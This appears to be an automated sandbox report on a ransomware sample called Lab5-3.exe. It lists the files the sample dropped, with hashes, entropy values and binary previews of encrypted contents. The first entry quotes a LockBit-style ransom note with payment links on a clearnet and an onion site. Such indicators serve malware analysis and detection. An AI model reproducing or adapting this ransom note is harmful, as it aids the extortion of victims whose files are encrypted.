                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):4176
                                                                                                          Entropy (8bit):7.955179684345518
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:lnXG5d+iYco+7dVF8lNAUkvY8OPozRhGx0uKeY2ElUJ:1G5RYm7J8NUYaE0Cb
                                                                                                          MD5:04E1F2B51B2B30933B9E942A177770F2
                                                                                                          SHA1:C9529EAC12E391F35629CFCA6E0309A348A85A11
                                                                                                          SHA-256:602567FD7EB014ACD42FF8576A557C3658C30C05748128C0B30197EED0193E7B
                                                                                                          SHA-512:7517B912F285AA7AC295976C99B7275A11EC9100DBD72EEAE2F66BC540E7D1B7179D101E27CEECD991FACF13804C3FFD8D65933447F829EFAACF393D753081E9
                                                                                                          Malicious:false
                                                                                                          Preview:q...G..W...?"...6...m?\B......|../..u.....;.JX...{Wpk.o..V.3.\O.m..!.%....-.l..H1.D..^.H>...K.:.u...G....."..c=.........J........Y5.9.w.<.C.|..tu.&...O..tA.>.M.U.xr..6.5.+...[..$.....*\.R...~G2T(....q$.-).m..-.......>...4r. .d..X..Q^..o...o~.;J....C..l..f.......$g..}..;.]n....6Q.Q.....w..L?......GW...MAi...)?.=R.1`.O..Y.1...T.A*..........W5.@..Xv."..=>..iv.h3.8.2...C;c.9O6.....Z0.h~|)..h-L.OG..)...*..>.7.(.8...!.S.Rd....7w..._..H..'.K9._...E....^0S=...............?.2...dz.........g...aFFyGbX...y.8z...(t.P...t.~p.v.....M;.H....M+kfo./.$[..#.!()8j'.d9p...^..w......E..j..r..^.Dc..=..v]RR../.U...}i)..:...2 .....:R.d.)L.k.*.)...5.){.:..v..`.....t...|.[T.,.u.(;zt..K..Sglq(X.(~{...czn=m)).ow..<..~...{..L.O]!..M...N.zw....2.....qa.".k.-..X.e29..]..m.w...La1.-[..x=?.Q6.........HY.....F....f...k9M.$...:...p.i7...]./}.q....4.k.0To`D..,.m8....!-.......m.K.E..w..]N...h7........h.h6u.a......1-#.[.....;.q9....bI5...L....2....HmAN...t.)..yy.,Z.k.~...rJJ
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):8080
                                                                                                          Entropy (8bit):7.978273142160442
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:1ruDI9MPIBJvUboDWkWHnR4EI5V+IeHD+tQlV80Cb:0PIfvUdR4EI5V+hj+tntb
                                                                                                          MD5:2EF8197D996DF77C03C92F3F7BD1E37B
                                                                                                          SHA1:61DB5AF509385150BB9344522F56FC97CB4FBB12
                                                                                                          SHA-256:FE16AAADB98665D44DA4B0718E84D26D09AE5D88E2BF377274908723500B2BE7
                                                                                                          SHA-512:825E3DD819C552170D64B5D04DE3168DD66BCF6DC17061015FBDA07B40BB47B01C74CA64E107AE63C05A4C9D8BC4EBF1E3BF95AC00C9F5C1AA53A7720BA320A9
                                                                                                          Malicious:false
                                                                                                          Preview:,.TI..Du..i....~.n1N...]...m..].H`-..j...5P.mP....2.(.N....+..(....EW.....V....Z....r.:|..?q.h...B.a.....\....w..]N...b...a.,o.7.pL...1Vv.=..V....t..^hx.{I...5h.......P.k.....Z&s..0ky.%.......ET..)sE....ERQx.t.6......xe........(.J.t.Q...4.K.U.....&..-....bW...X0c.S..uD..W.-.}..t....&..._.q.Z....:.-(.y...;....>...<y.....W......Q..<.rp.v\..`&.....["..$...\..IZT....t*g.....(.r;.....J...K....7.^u.E9.L8I....&.&...)....R5.d)9IY..p:.K.[.=...{.R?l)p.....I'....A7..g.?.?...Ql.-{H?.rP.%].)....A/........#g..J.OA.....0......."..E....-.y....!....`...j.#.............EDF..dgiD.*"..v..u/jqat..FF........I..NN..\....8I...._..7V....F...@..>.{R.4.....w.........N.+.%..CF...k.]......2...n.....CL...$D.4Q}3...P...L~{.m.h-..A.f..F.Z..'wP.....X......+...f..p.7.k.:......v.........w. ..!........2.0. .."..N..2.....Z.e....9.ZE.......:..7........0....Ua.NK../.n`...O.{..v.H.g6.74..!./..O..b.%...5_.XST..*.D...pH..Y.....P.0..?.i.[.....1..6.P.5...V;.?...&.*.......CQ(.e...c...I?.r.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):9760
                                                                                                          Entropy (8bit):7.980372077743969
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:282TbrhEmlw9s4GbCEjyg85FOmXnQzeiuobSbpGAhJ8k0Cb:2849W9sKEjyXcd18p5hOktb
                                                                                                          MD5:D0EEBE10D5CCBDC45C6C5F3C55E65E4D
                                                                                                          SHA1:C98E2FFBC1DAD83A3F06499ABF0721ED67BE4D88
                                                                                                          SHA-256:92B6D40D932789FC020D0A8C8AB4612F3D3C8E7A119A28D792A1458387424A8D
                                                                                                          SHA-512:629D995BECE94B02FAD1451104BCE2E0380E5DC21B06D2C63EBCEC57C7B2D98484E1635DDC52A348BE5DB6AF01B63525E5E7CAEC384870EAA555FB62A8A7E075
                                                                                                          Malicious:false
                                                                                                          Preview:54....$MV..*.+<.e.`.i%..^....A...A.e...)...J.W..$0....S..n.?D.....S..!7.$.i.B...#.`.0.......!.%.$M&u?.j..*+-.TQM......h...5........hISg..x.a1..).Q.".1.:*.)..i.%j(...g.|..aH.q.".S#..K.{....]...,....".J..i.'K..|l..(..H...^..w.JiU.;`7f.yN.*.ts.+..e.^N.V....NLn.uYGUn..&m....F....5.+h....A..r..4=.J..m.Z.E..kj....{...u.......d].BIIW>6...i.h.N..4.>.:R].....WC.}....V{B .bz.x...H..MGCh...8.b+...1.+......)DG......'...V<.6q...4!..5.V..`...xC..q..5.`.`".,).C.......f.n.....{F....,.......g.g....(.C...Y;.0.|..f..K$bd..q......%.g.Pg!4.K=f.}....0o...q...Q....s...A.;..x..(..a.S..&....T0.g...!@....~.K....k...*.].`...+.......*..n....M..Z.....ltX$v..L...|_3.......C..X..?..=..n%...^...A....u-..R..O+oH.]b.....8.v.F.?T.m`$...S'tN0..y0.... X._.}.$N3....7.Q...i9<.).,o.......Z.D......qh...8.&.l..].j.WR....d..x+..h...V..w..k.....*.....=...^7.....%(es.Lm.>v...^@.Xo.6...&SM..e,.....d..v.cAg.po...)b.NV?Z.j.k..>.tvY..@..'=.P {..]............g.fL!....xL......wo.W.......Y2
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):4272
                                                                                                          Entropy (8bit):7.9590449661520575
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:MKugNOiXxyWoum8Talo9pTQMKojcXSuGx0uKeY2ElUJ:mgkUToudaliLKoYi90Cb
                                                                                                          MD5:C3DEBE45518A0172769FCA160D54D8D1
                                                                                                          SHA1:080708F8903701A3766706E864716DD7AA52D512
                                                                                                          SHA-256:A8FE8E015A778AA19244D723419CB8E0021594FA2D88F2016DB3C65A4824E644
                                                                                                          SHA-512:1ABAECA84C9A7D65CC958D1AFBC587B295CBC83DC1DE88C1E9530ADC7AAEB3C29AB51A1870D0F533690E21DF9BB85B5322B9A9F77602A4421A891C3B5CB7AA32
                                                                                                          Malicious:false
                                                                                                          Preview:.rBSh2.*.."...?.BV...a.5..:...g..&.!.f}..i.~$..J.C..1....8.<..>..&CPJ...C+.#p......i/6-.$."V6...Q.+<t\........)_Rt.R>.gZN..2-.!Vl.......K...._.T..]..;n.I.~/:..:5..2.......&>P.U....8oq..<...b8R.%.n...^'~F.H....f.].`......}..d..2.2.O....0......k.....1ig.......N.Ae_aQ.....{......V...r.\..2..\...Oc..oN..Z.-p|.U>.^H...,..#.U...Z.d.*r..T.P.*..iS...l....s..x..:4fO>$-.XO$.NGU.>..a:..\...O.B5N...z..........`.zSs.....0.<..O.k._..b%!.........)....J?..._%...NS@.R.G.)`..6...q.'.OUq...........6TKU....v...Ig...z...}.a./|..Bb..[.d..<....W. \.(*.0.........>'.P.$..N.W..8..q\.B..j...2..WtY..J.{.eY.<l..R....w..3.k.sY..l...z<.K.....|.X{.\...$..........B.Q.q5.-...f....o...<...!Q0..&.7...$.b{.....&$...V..$a....,h.....t....X.8....,..>.#...>.C........8.S.@..Pl..i`.N..........%.T.....C.N9..?c.]... .)r^..?.I.c.u..C...E,+t.6M...?G@a....../.x..f............u.......1...."..^..b......lT..S..9.J..'..O...okT.S-...x..!!.sr.......e[...1..kg.A.>.p4...fr........-8H..[.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):15632
                                                                                                          Entropy (8bit):7.988205080622607
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:tPQLxjAWdf75gzUl5F7eBFTBX053f5Ttb:Kjhf7OUPF7eTp0539Z
                                                                                                          MD5:C60992D1D2BE2DC78EBC0C9FAB772EC6
                                                                                                          SHA1:5945C115DE2538BE530AD60EBCF90CC6FC34BF86
                                                                                                          SHA-256:30F977459D2C6E938F2B28507C969E3A3C53CCD1F56F7F31D9259299BBB5DD96
                                                                                                          SHA-512:E780B792C523448D997E1494E90F9BB3D62CFEA12AC1709FD0B124891ECEEEA30D0CA015225F49D7A867E5A2CE30846D3E7BB882B6F44AAA58CFFB76EC7BA312
                                                                                                          Malicious:false
                                                                                                          Preview:[....q.J.0.....y.O.|...R#.-.D.U&P'^ce...tK.............~U.2F.......4.e:.....Q...z..i.i...[r.*/O......_.l.9[...c.'...6........r.E....1.m.H.d.-.l.;%.nE(\..s%D9..&....W.TX..&..iD....b....1_.....`.p.....3.NG.].Rm....!.. ...T...js.<%..;....I..c'.Y..w..z.."..z....{.m._...C.I.z$..".!..M.JJ.W..K....J@J.>..2..*-.'.a).@......`H^wa.D;x$.\.....[tX;...!"".$"J>4..s}.2.e*...?.D...M.Q..o.......x....T<.`.K....C0....D..M..=.m"....9W.D..*.....TG&C.........K.58..9.=*n..8....I.h<t.F.#.7....n43{.B~.........9p..2.......RnQ...A.yY..%.....>.\5r,.........}./.m..f..I.S.W...}..0.}.|-o...I...wRD.?28...ja.. .'L"P{.}.....m.K;....h .....%r.z.aY..a.#."u.$"R.5'.SW)yw.f..L..v......Z.{.n...YF..lTTb.........5..#....`,.,u1.....0.I..A.<......Th=G,.`.^.!..............B..I.o KW.K{I..Z.sN....J.../n.b[..$<s6......2.1..{$..n.^.}#..va6>..VMu......m.+..W.q..-M...<[.....u.A...r.;'f."..i..g...X......{..8..........,...y.A.....p.e.B...GD..<.h.D.."M~;..S..M...5..A..]....J.%.v..6W.3.T..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):15120
                                                                                                          Entropy (8bit):7.98491466251223
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:baYEC3TD9BK3v+/JduFEyjwGzPTTBimtb:eYXdBK3vMIFLjwGv3Z
                                                                                                          MD5:6E43243CE4CBA332368D45ECF99F6D63
                                                                                                          SHA1:461C0E4E999C8BC20A8351E7B814CE2909633F29
                                                                                                          SHA-256:787936DBCE361657F1F992DB1DF2A2F891C96189B5C5C956121415635612BE94
                                                                                                          SHA-512:0E9D695313F1C9F0D3947A1B6041E8979B73B7880F10503701BEAE524F76633131648D57F2040418AB82946DA859169273419B0425269970ACDA8C07D052C717
                                                                                                          Malicious:false
                                                                                                          Preview:Q........Q:5+.Rv....0k... ...&n,..=I>...?#.]....!.....(....\2&..Y_@..;<.\.IV!..s_..t.J,"..@.....XGf.. ,P.h...GB...5.}.....d]...q>..N.;.........../..^.x..F....d...;._}......w....8.....oF..POI.plNK.?2..o..8.........,.&...'..8i...........V..W.D......~......}.y|......}P[..fY..i......P.kd.:.....[B...j..<.^.+kw.\..1.+.yT.'F.....N.4...<....\.j.7A..h>...A@...H.v....;..x..S....q=G..E:@yV....C2..C...A....n#.tQ...........!.!.7.W.AL...[.O.C.Z...,.d|...*.z..(}.8..>..S.!..A.+.'.r:.K..C..j)........Q......._.|p.............9]..zJN.+.Y...V...v!.G.W55.DI.Q......DN@p.M.D...P"=-...3.|.0p:...2..h.~...u..._.....J.R..H.u2.'.P.Rg...K.H.*..5.i.X.5..S......8a..B...26....p.m.......b.Y...>7.&...e.O.YL..JE.ii..B(...9._<.m./...]...2...9...L=_.x.4...[~..K%J.<Ge...R...P.....0.....B2...W...t.VC.Vy....D.-...9.n..............w.9Q.u..(N4..&...|.,....b..XV0?K...0]T.c.}.N&..Ln.>.?.O...X|`k2e&;Qv...I.......g`aI...Y3....].7?#6.*Ie./...*/...........Q.r..`.-l.|.W.3^.t
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):6480
                                                                                                          Entropy (8bit):7.973746550143718
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:MKecCWwUzU9GrCAjvT0imLwsPg7YfND9Qa4N2TDZsmTs2uwFzv6NcGx0uKeY2Elk:MK4WwUbOAjbx474E4BN2TDacsyvQv0Cb
                                                                                                          MD5:A1176BBF4C8B00DC6549D97DB9B6E49F
                                                                                                          SHA1:127F003630C6928CA0568A1F6C5337E881F73C4E
                                                                                                          SHA-256:ED859E9DC58DADC865E12D076AF8A19B433FD1227CC15AB5740C80A5223119E8
                                                                                                          SHA-512:56582EEED54AA2296C4527AD5AE8F6C69716C29D3CC95D2E39E08CE44E9E535EFEA923118EA44A45BEC984C65694400457F629CFFA67CF1717958D44ABCF261A
                                                                                                          Malicious:false
                                                                                                          Preview:..."u..).._..>.g.m...A...`)..}...#.WC..s./..m>..7y...F.j.i.p.?......q)...=...\....L..........:.3.D._.B._a.B.....i.!......1.l.L.lr....t.kk.G .T.9..T.9..[..[.QJ.=..x.I.Q=.Z.............0....4..."....Cy....'.3N...l4`.#.!k;Y.Ekg.*..}<..GQ....H...K."ic...l.n...aW....Y..L.....3-.94.H...a. ...d&.r...s(.R..V..$...9..~[i.)...........La.[.6_.G;;.Zhc.Pt............r...Q) 8......8..(,?:.3....*v.........9X?]|.ptj.Oxo.....e.w/......}GS[s...3.1..KrB..f......yz.^...M[.G..Bu.M<..'.I......o.......6v......-....V.v...8.$.L4.a........H.{..cx..zz2'@....p=.P.2.l.'F.B@......o=p...2...a]...H9...7./..a.).j.@....._....-...........@..(A......A....#]..U.M.........@F$.k.7.K.nH....?...'......6&B6...~G...iG.T.........q.%u.../.p.C..*.....Tat...].=c..;{p.....:.\..<u.....&.....RA..\8.A0.k A..*p..x..lD.... '.^....m".a...G]W]....2,.a.PF..2.d/.6..~Gs}g.(....gt.a.`= ....=..l.zX..*.S...i...H.6/'B.!..^.?...%..O=.\.....SbN.Gp....Q.q....j.y.Q....;W:.o.....}.. ....#h.."Z...0..eG;|t.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):3136
                                                                                                          Entropy (8bit):7.941907470039485
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:z4hRC29KKcqrGMXVuZuEBoMXK/jLSUfpKoZ0MzJBIZHfUTid3hBaUoSGFcmeykEO:krvfnrjVYuEBv6/pzZ0WGx0uKeY2ElUJ
                                                                                                          MD5:A6B10B6EC18FB55F52C6D026B870037C
                                                                                                          SHA1:CB270846E0E761CE956089D6EA71868EB93647C2
                                                                                                          SHA-256:7AA07D3A21DA224CB2C694D72CB57C8419199FF7870AAABEAEA7E4614E8C7695
                                                                                                          SHA-512:6D625D2A5333421D8CCE4350152D8B8429F96D8BC34F9804123F8750C0186C048090077CB5DFA34EBC2560D33D30514DD40B557D48BB5AEE5B13697CB69DBD4F
                                                                                                          Malicious:false
                                                                                                          Preview:..O...].rn"*.....7r...d.'T|..6.L../....F.8..H.6..y...3...8....X....(!.....w.................'xm....{C..X.E$.+..a..L.`.".qq.V:.D..j....s...g.e...PA!... ..i..".;/.u{...5.9..P.]...~.....z....9......:..%..u..8.0e...l....T6 .A0....... ..........]...$^...j..t........|..o....).......d.M..c...o...Ku.\.5.W.S Y2...8bS..{o..P.A..D.=.0GD!.......{yjY.6...&.....G.8.....Qyq.N1F*.?.Y.........|.!.*j~BO.c]..I..c.0r..N2C.B..!.1v...la.N...m.Z.<.h.gDT:...{[\...H...!"....}......^...3....f.*$...D.3T..o..i.Gv}..P.=.@.......Q<~H.Q..w..Ds..1.S..if.J...a....9.v>_..........|....U........~.f.....vK.b.r...w.t..........c.e.$....4...#....~..>..g.)..T..$a..>........4R.P_#0X.9.c..9.i.J......h...0.l.0.Z...f.R..a6..dn!/C`..;'.r....[.U..y.....YQp..b..3.....w.7..=LG...2I6$......4..e...v...o{....\.8.CH)..V.......L].>../m..../.w.).r...$..-U..?...<..1&....w......Og...{....m}d5..OeY...O.d[."...+p9......jU..*h}.:aQL..A7.DA...(,\i......_.....V../..a.'.G.....jy.:<....@2.X../..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:old 16-bit-int big-endian archive
                                                                                                          Category:dropped
                                                                                                          Size (bytes):7120
                                                                                                          Entropy (8bit):7.974893102694419
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:3QIqq6WAibtc9MHnyz5zM7kRliT0HbkUYS97F5hxOSbLRcsVBvoYpsGx0uKeY2E+:AIqqTAEtc9IuF2kRATmfYS7/ASzgs0Cb
                                                                                                          MD5:674EAA3577190CB66C287449720B8AF8
                                                                                                          SHA1:C41985E092452D1C748B7AA1BC674F76F3EDDE3D
                                                                                                          SHA-256:D642C9EDA93B6B170BC6B49238C3252E80DD4D906372E3D142E8202A6038E0F9
                                                                                                          SHA-512:522A6C6FDB1D2ABFBE7DD2CD5306ED601EC9CFB58103FC77212863DB19FBEDC237A45C36C4C9BFB9D5E815ADB9C65CD42C2EC1D555E8462D32FDC9FDB59E6637
                                                                                                          Malicious:false
                                                                                                          Preview:.e#...wz(....-[.R^.O.Y.I...... c........1M.V...8.......o.oNR......;..\..?<....[w.A..Q.....=...].?Z.~...].....}.z......../....1....t.I......'...=-s.-.yR..q<x>..9Q.bT].<.r......IR...(....G.....M..G...s.WA.W....y.S.....oI<..O..".].)...h.'?..8l.%w.T....N.0y.+'....F..]...HbVU..9[...8.9./..r.'.*.89....R..>....n...j.........jz[.tT...&[Oe^Q.si.=.T.f&.-.&....$.8.J......3.].@.........\,.y.....K...m....V.(..hV.5.Ea#.....gx..e}..+...j.o..@..>....U[~,...8N.....L....L..>....O..3_u.0....&.!^.......g...|f.....~..A.l....7.3.`j_.B.R.....=........s=u.p....aZ4..;.-.;.2..........[..G.....=...O.(..i.D,m5...xj....HH.y.h.dY..Zeu..N<Y..p.e.2.4...G.:....H.T..uN\!z....,.\..z.....e.W.A....:...o`R~DrX2So.WW......_N(7.D...../.f..l.e........`.....Eg...X.........P...........{.G.'..3.:.sb+..Z?.t[.......>.|....P.X.w>.j.....scw}[ ..HP.nt2...9z.....y`.iF...........Q......9..\.%.w..#.ym.!.N/........5X..y....`....U@...'~.g^.6Z......2...#u5...X..d.h......'X..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2528
                                                                                                          Entropy (8bit):7.921824521074579
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:XoeilXHDfUQ4hwleAQeNaR4gHfUTid3hBaUoSGFcmeykEdEElU92i:XoeiBDsbwlZNaRgGx0uKeY2ElUJ
                                                                                                          MD5:F6074FDEAE39782525ED78B3B60C5741
                                                                                                          SHA1:0E3199D401878386D6BCE79F3FE29FC9E37EC20A
                                                                                                          SHA-256:BE05479AF3343EAED4B60F8440A62E970B841449CBB64041D6F0179AE12965A3
                                                                                                          SHA-512:60C1280C2A205D6744B48CF0ED34BF5368B4F235F125A9A7BDB5AF498901748AC6129A26833EF7985BF40A25134426F8DB086ADC5531D89ACCEF4DDCF8FDF265
                                                                                                          Malicious:false
                                                                                                          Preview:z!.q.!e.&or...:......q..p.:.....j.J....`J".M8b.etN..`N...u@...faJ..)>.xPg.....T.@p.:....$...R..l.L~...].............t0...._=.....L.:..f.......Rs.......&...5....l..M..1.D.n..<Vo.=.j.a......p..C.n..e....'N..?....S.. .....Do22...rbKE.B.1|.N..c9u..cb.pP..W......|..._..RI.._VJN.....B.........I..6...2)w:...L[.}bx6n.%.zs...V....n...(k..:.. .p..[.}..d.0N...-.[?Y...........)s...........x3x..A.b.]m.'...)...e..Q.....P...(..BA.;2...H.V`.n..5..+....B...Ro..z.....s..>i....abE.6YPG\.....yK......O....S.|i.p.*...{.K....|...!... ..1.Td.D..V.N...:c..`....w.h7..L... ..(.K?..'y.e........>_f...KQ..S.F./.....k......3g......r`.V......+..|...C.o........>.....n..`.T3...'.y\....B..[{.C.I...l.[5#8g.9.<..w|..W..%F...3.s...SxP.....K.5...]I.1.......D..v.-7..lU.d..q..6.2t%@q.....+...9....D.9m....|L..I....[...N.B.... ...2..?...>..........Zk...3...P.\Hr.~.g.=.d3...,.y.....4..gT...........X.8.r.....&UR...8V...N....SD............."|Ts@...}.i..\v...;..:
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):3200
                                                                                                          Entropy (8bit):7.9385154838976595
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:Cis1s+koAeMgd2Wk4FWLeL4Re9R25Gx0uKeY2ElUJ:HaMMXAeL4gR2C0Cb
                                                                                                          MD5:317560E50F3395FDA164373668B74088
                                                                                                          SHA1:BD5972DC836E3D27B7FD7A3603D6B90DB394D4A8
                                                                                                          SHA-256:4770A8A9175549EBFDF87AA2A87B89A9AA560F8894D77574BED21DE1CF47872D
                                                                                                          SHA-512:B333566D06DE6148D81C50CAB92DC565D136676C5AF2C5FBB5362622191D0BF0AD91EAF1B8B55AF46EDBA35C345A8EF0E65A78B6A458BBEE141A9498DBF56759
                                                                                                          Malicious:false
                                                                                                          Preview:...B1............t.O.bS.D.'{.....z..._..T.....).N.I.$.s..,..!.u..:..\.......=.wfebk.&.F..O...8y.x....v;.....%...(y....3..Y.!.i..kV.[..?..T.<h.....5..N0...5..{......M.r....#8.Z0.l-..*....6...c.E..s.3.y?.~.6....e?.]....u.T%5.d..9...v.6..;O......I.4...!........,.....mb._.Y..r.m...h.%.X-L....g.....{~..O.!..nzx..v|...._>*....@c.rM..Hm...HI......T.7....L.e.}.V.w.IR..u..H.!&..;..r./..U....v.T.........C..O..]-.W.!..9....N..6>1.6].4W.T..Sv..qrN[n...U.....TcA5...I.3...I...N.=C..+0.......12......38....3..:R.5.."R...hHp..!>....4O.'y..B...3}.......X....((.(.....Wxh.O#y}*...0.<....J.5T:Q.b.!.:.QxwpH..M...VU..s........D..O.=Xz.\..DI.?.V.QeEbAOYWV[..0*...O..5.l7..g..P.|."0..D......qc.pe......:Y.9..@.$..j......|G....?..IX.Wt.wd5...)...H...v.....4.=..2...i.z..........P..Y.^b.}#8.`..wR...........+.-.0Q.s...1...5..M.w<.......P.I".A.@..&[....0v)..C.+..\<X4.mQK.>...@.L...6V.......B ...m.,.....J".Y...9...s".....uo.Q...h...~..4-...N=...`......;.$.....G#..<+Q.....35g
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2608
                                                                                                          Entropy (8bit):7.93531910404486
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:joudDG5eZg8u+1AgCorvqlFSr8Yp8RHfUTid3hBaUoSGFcmeykEdEElU92i:fxLu4UorvESrUSGx0uKeY2ElUJ
                                                                                                          MD5:EFF65E4CD682F8DF20F8E6A5E4E2C467
                                                                                                          SHA1:40BF1320CC35F0A3E4F34084E5B545CDC9358BD9
                                                                                                          SHA-256:D963FB10F80080A04413AB29A81A1649868B00916B928138E9A80748968F0586
                                                                                                          SHA-512:103143FE20CE5C8A4F7330C4AA6C8AC8FA6440C4D7A39C50C19823309298B092D65049574D18DE37AC892898228302D881506A08B10C467238664B1045B28098
                                                                                                          Malicious:false
                                                                                                          Preview:.......b.cl.e..3^`..N(....]kf.....!b.$<.P....h.....$...C"Sc.a-^Y..W..DP.......X. ..h. ..9rp..O..3T\X2..%Y#&{..:.qt....e.L......2......b....A.!..........`I.A...;.......b...y.....0(VR....MS....KU. ....,...,.d3......-.l.5H.'..P....F....E.K..{..>ip.........l...n..E._.......].j.$w(.h......`..g.7..\....[...B.Z{k.W.X.._.>,."R...l...n.....7m...e>. .}..f...aL..6#Q<.e....4.v#i[.8.%.y-.G`......L..=...tc.."..........z.6M..d.F.S..6.....rt]i.p.^..y.....O.c!....V*.#3.F..&..nm.....Q8...O.!.....v..Z.,...>......X.8|_;..&w}..3...KF.b.Z....e.p.....r.~&c.l.(b. .......(.3.l..q8O[....n..00u.....W....-2\+...9...*G...q._o3'e..>>./.i...@.F.hR..../5.(...qNL-..C.M....7{y..8*..^.w(...(.0V.r.A.4..K0.)..} ...AQTG...e..'.{.....).hG../Qc*..W...cJ....Z..N.....HG.)...M..".[s.....ed.B..(....c|;..7If.j......ILa...!.(DO.a...L9..\.T..WW.....9r..`..dY}K...[.|..(^....S.*.....v.tk...../...o..CN.KD.:6......c.y..w.D(.!.2..d.".J.m......$..<.\....D.yiD.u. .%U}.P......V4......t..t
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2144
                                                                                                          Entropy (8bit):7.927799831429746
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:ZeTSR7LehPDyszHfUTid3hBaUoSGFcmeykEdEElU92i:AQ7LegsAGx0uKeY2ElUJ
                                                                                                          MD5:6DA08F44A077AC0DA1E1E553D947496A
                                                                                                          SHA1:958C76820DF764E887ACD49DCE80EC13B4DC95E9
                                                                                                          SHA-256:21273FEE434DA283868783971863701EC9555F958550CEF2F84CBB1C7A13577E
                                                                                                          SHA-512:FAF175254EE0D32FBE8D6E22EA3E7853CF08E5980423E5B7797A81752FBECA51CED148150D3D3D0678E0EF296EB6C36D2CD222339EEECC7DAA274747BA3D719F
                                                                                                          Malicious:false
                                                                                                          Preview:..$H.........hb.a....d..?v..P.]q..<....7}.^.....$.?..).+ .<&..?..j.,...QG..HZ).4AM.KG...C.....~.i...^[.pq.....RZ...<7.....z....:j..C...~).....Z...6....5....?..1.fI..F...3.O..$...#.*#LR....7Hq.8N...W.....t>...v..o.;.f.S.C..N..W..tS.U.m..^....z...Z.u..Z.d.l..K9..t.d..c-}......?..[B...Zl+A....Y.J.....P`....l=D.K.}.7_=A".....6~.B)...7?....Gt..d.;...........*m>Y..1...l.._onT>../.9.Ny.w..,.0.....r>....l.=^.*....>.d..-.O.l.w...5/.E.y.2..X..|.w,D2..]..nP...a...1.D.e.[..._.v@.J.d0.....x...{&..>.....".V..9T.kd..K...e..q...q..8=..~[8q.|..".\...`c...F.....W.T2:I.u...c...C7..Y4........`.&.s..".i.....)X..%Aj8GH..#............UY^X2.v....B;y...2.}...>....n]...V....y........G.].1..%..:-...9..'.*.B....R....9[|cl.s`...Q..V......y...l.\.cy..M.... .}r.!&PE.{..7p....%q..bE^.I...)..)...i>`t.2+Z....BEe0U].........a..^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:DOS executable (COM, 0x8C-variant)
                                                                                                          Category:dropped
                                                                                                          Size (bytes):3568
                                                                                                          Entropy (8bit):7.959676805433324
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:96:DxZXMQlbw0Qmk1j4IwEsFGx0uKeY2ElUJ:DzRb7P3Do0Cb
                                                                                                          MD5:9918E1506E6C7C9186A6D320DD4B008B
                                                                                                          SHA1:99775173EA214C4D54F13907EC94C36DC01B1EAC
                                                                                                          SHA-256:44F3C84546A29DD88376191592F1B6231FF7757E250AA35A7C7B999C10E46AE4
                                                                                                          SHA-512:E5E1476FB0158DB4AD9093D33B6272B6FD7DDDDE7EE66F1D3B354AB11B15059A106D39374CF739352A7B7FC98F791494A21006DC4BC02F0D3B26FFD468655E31
                                                                                                          Malicious:false
